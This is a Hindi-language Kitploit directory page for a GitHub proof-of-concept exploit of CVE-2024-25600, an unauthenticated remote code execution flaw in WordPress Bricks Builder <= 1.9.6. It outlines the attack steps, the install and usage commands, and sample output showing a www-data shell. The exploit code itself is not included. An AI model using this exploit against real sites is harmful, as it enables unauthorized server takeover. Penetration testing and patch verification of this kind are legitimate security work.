Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC — अप्रमाणित दूरस्थ कोड निष्पादन कमजोरी WordPress Bricks Builder <= 1.9.6 में। टेम्पलेट रेंडर एंडपॉइंट बिना प्रमाणीकरण के PHP कोड स्वीकार करता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन संभव होता है। | Kitploit
उपकरण/GitHubGitHub/estebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubestebanzarate/cve-2024-25600-wordpress-bricks-builder-rce-poc

CVE-2024-25600-WordPress-Bricks-Builder-RCE-PoC

अप्रमाणित दूरस्थ कोड निष्पादन कमजोरी WordPress Bricks Builder <= 1.9.6 में। टेम्पलेट रेंडर एंडपॉइंट बिना प्रमाणीकरण के PHP कोड स्वीकार करता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन संभव होता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
137 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-25600 — WordPress Bricks Builder RCE (PoC)

WordPress Bricks Builder <= 1.9.6 में बिना प्रमाणीकरण के रिमोट कोड निष्पादन की भेद्यता। टेम्पलेट रेंडर एंडपॉइंट बिना प्रमाणीकरण के PHP कोड स्वीकार करता है, जिससे वेब सर्वर उपयोगकर्ता के रूप में मनमाना कमांड निष्पादन की अनुमति मिलती है।


यह कैसे काम करता है

  1. लक्ष्य के पेज स्रोत से Bricks nonce प्राप्त करता है (एंडपॉइंट के साथ इंटरैक्ट करने के लिए आवश्यक)।
  2. लक्ष्य के संवेदनशील होने की पुष्टि करने के लिए एक परीक्षण पेलोड भेजता है।
  3. रेंडर एंडपॉइंट के माध्यम से कमांड इंजेक्ट करके एक इंटरैक्टिव शेल खोलता है।

आवश्यकताएँ

  • Python 3
  • निर्भरताएँ स्थापित करें:
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit

उपयोग

python3 exploit.py -u http://TARGET

उदाहरण:

$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

संदर्भ

  • CVE-2024-25600
  • Bricks Builder Security Advisory
  • Wordfence writeup

श्रेय

  • खोज: Snicco / Calvin Alkan
  • मूल शोषण: K3ysTr0K3R
  • सफाई और सरलीकरण: Esteban Zárate
टूल डाउनलोड करें